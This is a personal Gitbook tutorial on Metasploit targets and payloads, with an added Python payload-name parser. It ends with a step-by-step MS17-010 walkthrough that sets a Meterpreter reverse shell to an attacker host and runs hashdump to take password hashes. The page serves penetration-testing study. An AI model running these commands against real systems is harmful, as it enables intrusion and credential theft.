Noirchapeau's Gitbook

Targets and Payloads

What Are Targets?

In Metasploit, a target defines the specific configurations or versions of an operating system, application, or service that a module is designed to exploit.

Key Points:

  • Some modules automatically detect targets using Automatic mode.

  • Others require manual specification of the target index for successful exploitation.

Managing Targets

  1. Listing Available Targets:

    • Use the show targets command within a module to list supported targets:

      msf6 exploit(module_name) > show targets

      Example Output:

      Id  Name
      0   Automatic
      1   Windows XP SP3
      2   Windows Server 2003

  2. Selecting a Target:

    • Manually specify a target by its index:

      msf6 exploit(module_name) > set target <index>

  3. Best Practices for Target Selection:

    • Use Automatic targeting (set target 0) when unsure of the system version.

    • Manually set the target index if you know the exact configuration, for better reliability.

    • Cross-check system details using reconnaissance tools before selecting a target.

What Are Payloads?

Payloads are the code delivered to the target system once an exploit succeeds. They define the actions to be performed on the compromised system, such as opening a shell or maintaining persistent access.

Types of Payloads

  1. Singles:

    • Self-contained payloads that perform a specific task without further dependencies.

    • Example: windows/shell_bind_tcp – Opens a shell bound to a TCP port.

  2. Stagers:

    • Small payloads that establish the connection (reverse or bind) and then download the larger stage over it.

    • Example: windows/meterpreter/reverse_tcp.

  3. Stages:

    • Provide the advanced functionality; downloaded by the stager once the initial connection is established.

    • Example: meterpreter – A powerful post-exploitation toolkit.

Staged vs. Non-Staged Payloads

Type        Characteristics                          Example
Staged      Split into smaller parts for stealth.    windows/meterpreter/reverse_tcp
Non-Staged  Single, larger payload for simplicity.   windows/meterpreter_reverse_tcp
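As an added example (not part of the original notes), a small Python parser that applies the naming convention the table relies on: a slash between stage and stager marks a staged payload, an underscore marks a single, non-staged one. It also reports whether the connection is reverse (the host connects out to a handler) or bind (the host opens a listening port), which is the network artifact a defender would look for; the ARCH_TOKENS set is an assumption, and cmd/... command payloads are outside the shape handled here.

```python
"""Classify Metasploit payload names by the slash/underscore convention.

Added example, not from the original notes. ARCH_TOKENS is an assumption
covering common architectures; names of the form cmd/unix/... do not
follow the stage/stager split and are not handled.
"""
from dataclasses import dataclass
from typing import Optional

# Assumption: architecture tokens that may follow the platform component.
ARCH_TOKENS = {"x86", "x64", "aarch64", "armle", "mipsbe", "mipsle"}


@dataclass(frozen=True)
class PayloadInfo:
    platform: str
    arch: Optional[str]
    stage: str        # e.g. "meterpreter", "shell", "powershell"
    connector: str    # e.g. "reverse_tcp", "bind_tcp"
    staged: bool      # True when stage and stager are separate components


def parse_payload(name: str) -> PayloadInfo:
    """Parse windows/meterpreter/reverse_tcp (staged) or
    windows/meterpreter_reverse_tcp (single, non-staged)."""
    parts = name.strip().strip("/").split("/")
    if len(parts) < 2:
        raise ValueError(f"not a payload path: {name!r}")
    platform, rest = parts[0], parts[1:]
    arch = None
    if rest[0] in ARCH_TOKENS:
        arch, rest = rest[0], rest[1:]
    if len(rest) == 2:
        # stage/stager separated by '/': the stager fetches the stage later
        stage, connector = rest
        return PayloadInfo(platform, arch, stage, connector, True)
    if len(rest) == 1 and "_" in rest[0]:
        # stage_stager joined by '_': everything ships in one piece
        stage, connector = rest[0].split("_", 1)
        return PayloadInfo(platform, arch, stage, connector, False)
    raise ValueError(f"unrecognised payload shape: {name!r}")


def network_direction(info: PayloadInfo) -> str:
    """'reverse': host connects out to a listener; 'bind': host listens."""
    if info.connector.startswith("reverse"):
        return "reverse"
    if info.connector.startswith("bind"):
        return "bind"
    return "other"
```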

Popular Payload Types

  1. Meterpreter:

    • A memory-resident payload with advanced post-exploitation features.

    • Example:

      windows/meterpreter/reverse_tcp

  2. Generic Shells:

    • Provide basic shell access to the target.

    • Example:

      windows/shell_reverse_tcp

  3. Advanced Payloads:

    • Payloads with specialized functionality, such as VNC or PowerShell.

    • Examples:

      • windows/vncinject/reverse_tcp – Provides remote desktop access.

      • windows/x64/powershell_reverse_tcp – Executes a reverse shell via PowerShell.

Configuring Payloads

  1. Setting the Payload:

    • Select a payload compatible with the exploit:

      msf6 exploit(module_name) > set payload <payload_name>

    • Example:

      msf6 exploit(ms17_010_psexec) > set payload windows/meterpreter/reverse_tcp

  2. Configuring Payload Options:

    • Use the show options command to view the configurable parameters for the payload:

      msf6 exploit(ms17_010_psexec) > show options

    • Example Parameters:

      • LHOST: Local host (attacker's IP).

      • LPORT: Listening port for the payload.

      • RHOSTS: Target host(s) IP address.

  3. Setting Options:

      msf6 exploit(ms17_010_psexec) > set LHOST <attacker_IP>
      msf6 exploit(ms17_010_psexec) > set LPORT 4444

  4. Persistent Options:

    • Use setg to configure parameters globally across multiple modules:

      msf6 > setg LHOST <attacker_IP>

Example: Exploiting MS17-010 with Payloads

  1. Select the Exploit:

      msf6 > use exploit/windows/smb/ms17_010_psexec

  2. Set the Payload:

      msf6 exploit(ms17_010_psexec) > set payload windows/meterpreter/reverse_tcp

  3. Configure Options:

      msf6 exploit(ms17_010_psexec) > set RHOSTS <target_IP>
      msf6 exploit(ms17_010_psexec) > set LHOST <attacker_IP>
      msf6 exploit(ms17_010_psexec) > set LPORT 4444

  4. Execute the Exploit:

      msf6 exploit(ms17_010_psexec) > run

  5. Post-Exploitation:

    • After a successful session, interact with the Meterpreter shell:

      meterpreter > getuid
      meterpreter > hashdump

Command Cheatsheet

Command                      Description
show targets                 Lists supported targets for the module.
set target <index>           Manually sets the target index.
show payloads                Lists compatible payloads for the exploit.
set payload <payload_name>   Assigns a payload to the exploit.
show options                 Displays configurable parameters.
set <option> <value>         Configures a parameter for the payload.
setg <option> <value>        Sets a global parameter for all modules.
